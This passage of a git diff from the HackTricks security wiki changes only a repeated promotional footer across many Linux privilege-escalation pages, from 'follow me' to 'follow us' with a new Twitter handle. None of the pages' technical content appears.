[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -123,7 +123,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md index ae6d9d256..38001fd29 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -104,7 +104,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md index c91782a3c..60b5fec57 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -108,7 +108,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/seccomp.md b/linux-hardening/privilege-escalation/docker-security/seccomp.md index a41f2439c..0e2fc5bf9 100644 --- a/linux-hardening/privilege-escalation/docker-security/seccomp.md +++ b/linux-hardening/privilege-escalation/docker-security/seccomp.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -187,7 +187,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md index b9836d243..522f9a413 100644 --- a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md +++ b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -50,7 +50,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index 12eed9087..f09a01b29 100644 --- a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -314,7 +314,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/ld.so.conf-example.md b/linux-hardening/privilege-escalation/ld.so.conf-example.md index c09b7b779..c9e7f58c0 100644 --- a/linux-hardening/privilege-escalation/ld.so.conf-example.md +++ b/linux-hardening/privilege-escalation/ld.so.conf-example.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -176,7 +176,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 7300f6342..0c13b6978 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -1731,7 +1731,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/logstash.md b/linux-hardening/privilege-escalation/logstash.md index 2cce631f8..1489b6bde 100644 --- a/linux-hardening/privilege-escalation/logstash.md +++ b/linux-hardening/privilege-escalation/logstash.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -86,7 +86,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index e1227e18d..d6866910a 100644 --- a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -149,7 +149,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/linux-hardening/privilege-escalation/runc-privilege-escalation.md index 5b5f5ff83..9a4fff6e0 100644 --- a/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -63,7 +63,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/selinux.md b/linux-hardening/privilege-escalation/selinux.md index c61e6d583..4550835bc 100644 --- a/linux-hardening/privilege-escalation/selinux.md +++ b/linux-hardening/privilege-escalation/selinux.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -45,7 +45,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/socket-command-injection.md b/linux-hardening/privilege-escalation/socket-command-injection.md index 1c001d4b0..89d216a95 100644 --- a/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/linux-hardening/privilege-escalation/socket-command-injection.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -69,7 +69,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md index dbbfb3f70..65996b6dd 100644 --- a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md +++ b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -24,7 